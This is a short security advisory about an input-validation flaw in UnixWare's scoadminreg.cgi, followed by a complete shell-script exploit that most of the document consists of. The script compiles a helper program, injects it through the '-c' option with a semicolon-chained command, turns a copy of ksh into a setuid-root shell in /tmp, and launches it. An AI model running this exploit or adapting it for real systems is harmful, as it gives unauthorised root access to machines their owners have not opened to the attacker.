52 lines
No EOL
1 KiB
Bash
Executable file
52 lines
No EOL
1 KiB
Bash
Executable file
source: https://www.securityfocus.com/bid/3936/info
|
|
|
|
UnixWare is a commercial Unix implementation distributed originally developed by SCO. It is now maintained and distributed by Caldera.
|
|
|
|
The scoadminreg.cgi program does not properly validate user input when executed with the -c option. Because of this, a user may load an arbitrary program with the -c flag. When this program is executed, the file loaded with the -c flag will be executed with administrative privileges.
|
|
|
|
#!/bin/sh
|
|
|
|
## jggm@mail.com
|
|
|
|
CC="gcc"
|
|
SCOADMIN=/opt/webtop/bin/i3un0212/cgi-
|
|
bin/admin/scoadminreg.cgi
|
|
|
|
#
|
|
#
|
|
#
|
|
#
|
|
|
|
echo
|
|
echo "jGgM root exploit"
|
|
echo "http://www.netemperor.com/"
|
|
echo
|
|
echo "Mail: jggm@mail.com"
|
|
echo
|
|
|
|
if [ ! -x $SCOADMIN ]; then
|
|
echo "$SCOADMIN file not found"
|
|
exit 2;
|
|
fi
|
|
|
|
cat >/tmp/jggm.c <<_EOF
|
|
|
|
main()
|
|
{
|
|
setuid(0);
|
|
setgid(0);
|
|
chown("/tmp/jGgM_Shell", 0, 0);
|
|
chmod("/tmp/jGgM_Shell", 04755);
|
|
}
|
|
_EOF
|
|
|
|
cp /bin/ksh /tmp/jGgM_Shell
|
|
$CC -o /tmp/jggm /tmp/jggm.c
|
|
|
|
$SCOADMIN "-c /tmp/jggm;/tmp/jggm;"
|
|
|
|
rm -rf /tmp/jggm /tmp/jggm.c
|
|
|
|
/tmp/jGgM_Shell
|
|
|
|
# end of file.. |